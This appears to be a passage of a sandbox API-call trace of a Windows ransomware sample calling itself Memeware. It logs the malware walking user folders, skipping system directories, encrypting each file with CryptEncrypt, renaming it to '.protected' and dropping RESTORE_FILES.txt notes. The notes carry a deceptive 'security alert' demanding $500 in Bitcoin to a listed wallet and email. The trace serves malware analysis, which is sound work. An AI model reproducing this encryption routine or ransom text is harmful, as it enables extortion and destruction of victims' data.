1 [0094.293] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.293] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0094.293] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.293] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0094.293] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0094.293] CloseHandle (hObject=0x154) returned 1 [0094.294] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat.protected") returned 94 [0094.294] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\windowsmail.pat"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\windowsmail.pat.protected")) returned 1 [0094.294] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0094.294] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0094.295] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\RESTORE_FILES.txt") returned 86 [0094.295] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.295] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.295] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0094.296] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0094.296] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0094.296] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.296] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0094.296] CloseHandle (hObject=0x150) returned 1 [0094.296] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0094.296] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0094.296] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\RESTORE_FILES.txt") returned 82 [0094.296] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.297] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.297] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0094.298] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0094.298] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0094.298] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.298] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0094.298] CloseHandle (hObject=0x14c) returned 1 [0094.299] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.299] lstrcmpiW (lpString1="edb.chk", lpString2="Windows") returned -1 [0094.299] lstrcmpiW (lpString1="edb.chk", lpString2="Program Files") returned -1 [0094.299] lstrcmpiW (lpString1="edb.chk", lpString2="Program Files (x86)") returned -1 [0094.299] lstrcmpiW (lpString1="edb.chk", lpString2="$Recycle.bin") returned 1 [0094.299] lstrcmpiW (lpString1="edb.chk", lpString2="System Volume Information") returned -1 [0094.299] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk") returned 65 [0094.299] StrStrIW (lpFirst="edb.chk", lpSrch=".protected") returned 0x0 [0094.299] lstrcmpW (lpString1="edb.chk", lpString2="RESTORE_FILES.txt") returned -1 [0094.299] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0094.299] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0094.299] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb.chk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.300] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk") returned 65 [0094.300] StrStrW (lpFirst="edb.chk", lpSrch=".txt") returned 0x0 [0094.300] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk") returned 65 [0094.300] StrStrW (lpFirst="edb.chk", lpSrch=".rar") returned 0x0 [0094.300] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk") returned 65 [0094.300] StrStrW (lpFirst="edb.chk", lpSrch=".zip") returned 0x0 [0094.300] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2000, lpOverlapped=0x0) returned 1 [0094.328] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffe000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.328] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2000, lpOverlapped=0x0) returned 1 [0094.329] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.329] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0094.329] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0094.329] CloseHandle (hObject=0x14c) returned 1 [0094.329] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk.protected") returned 75 [0094.329] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb.chk"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb.chk.protected")) returned 1 [0094.330] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.330] lstrcmpiW (lpString1="edb.log", lpString2="Windows") returned -1 [0094.330] lstrcmpiW (lpString1="edb.log", lpString2="Program Files") returned -1 [0094.330] lstrcmpiW (lpString1="edb.log", lpString2="Program Files (x86)") returned -1 [0094.330] lstrcmpiW (lpString1="edb.log", lpString2="$Recycle.bin") returned 1 [0094.330] lstrcmpiW (lpString1="edb.log", lpString2="System Volume Information") returned -1 [0094.330] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log") returned 65 [0094.330] StrStrIW (lpFirst="edb.log", lpSrch=".protected") returned 0x0 [0094.330] lstrcmpW (lpString1="edb.log", lpString2="RESTORE_FILES.txt") returned -1 [0094.331] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0094.331] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0094.331] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.331] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log") returned 65 [0094.331] StrStrW (lpFirst="edb.log", lpSrch=".txt") returned 0x0 [0094.331] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log") returned 65 [0094.331] StrStrW (lpFirst="edb.log", lpSrch=".rar") returned 0x0 [0094.331] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log") returned 65 [0094.331] StrStrW (lpFirst="edb.log", lpSrch=".zip") returned 0x0 [0094.331] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0094.350] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.350] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0094.350] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.350] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0094.353] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0094.353] CloseHandle (hObject=0x14c) returned 1 [0094.367] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log.protected") returned 75 [0094.367] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb.log"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb.log.protected")) returned 1 [0094.368] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.368] lstrcmpiW (lpString1="edb00001.log", lpString2="Windows") returned -1 [0094.368] lstrcmpiW (lpString1="edb00001.log", lpString2="Program Files") returned -1 [0094.368] lstrcmpiW (lpString1="edb00001.log", lpString2="Program Files (x86)") returned -1 [0094.368] lstrcmpiW (lpString1="edb00001.log", lpString2="$Recycle.bin") returned 1 [0094.368] lstrcmpiW (lpString1="edb00001.log", lpString2="System Volume Information") returned -1 [0094.368] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log") returned 70 [0094.368] StrStrIW (lpFirst="edb00001.log", lpSrch=".protected") returned 0x0 [0094.368] lstrcmpW (lpString1="edb00001.log", lpString2="RESTORE_FILES.txt") returned -1 [0094.368] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0094.368] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0094.368] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb00001.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.369] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log") returned 70 [0094.369] StrStrW (lpFirst="edb00001.log", lpSrch=".txt") returned 0x0 [0094.369] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log") returned 70 [0094.369] StrStrW (lpFirst="edb00001.log", lpSrch=".rar") returned 0x0 [0094.369] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log") returned 70 [0094.369] StrStrW (lpFirst="edb00001.log", lpSrch=".zip") returned 0x0 [0094.369] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0094.371] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.372] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0094.372] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.372] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0094.373] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0094.373] CloseHandle (hObject=0x14c) returned 1 [0094.390] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log.protected") returned 80 [0094.390] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb00001.log"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb00001.log.protected")) returned 1 [0094.391] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.391] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="Windows") returned -1 [0094.391] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="Program Files") returned -1 [0094.391] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="Program Files (x86)") returned -1 [0094.391] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="$Recycle.bin") returned 1 [0094.391] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="System Volume Information") returned -1 [0094.391] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs") returned 73 [0094.391] StrStrIW (lpFirst="edbres00001.jrs", lpSrch=".protected") returned 0x0 [0094.391] lstrcmpW (lpString1="edbres00001.jrs", lpString2="RESTORE_FILES.txt") returned -1 [0094.391] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0094.391] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0094.391] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edbres00001.jrs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.392] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs") returned 73 [0094.392] StrStrW (lpFirst="edbres00001.jrs", lpSrch=".txt") returned 0x0 [0094.392] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs") returned 73 [0094.392] StrStrW (lpFirst="edbres00001.jrs", lpSrch=".rar") returned 0x0 [0094.392] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs") returned 73 [0094.392] StrStrW (lpFirst="edbres00001.jrs", lpSrch=".zip") returned 0x0 [0094.392] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0094.394] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.394] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0094.394] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.394] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0094.395] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0094.395] CloseHandle (hObject=0x14c) returned 1 [0094.395] wnsprintfW 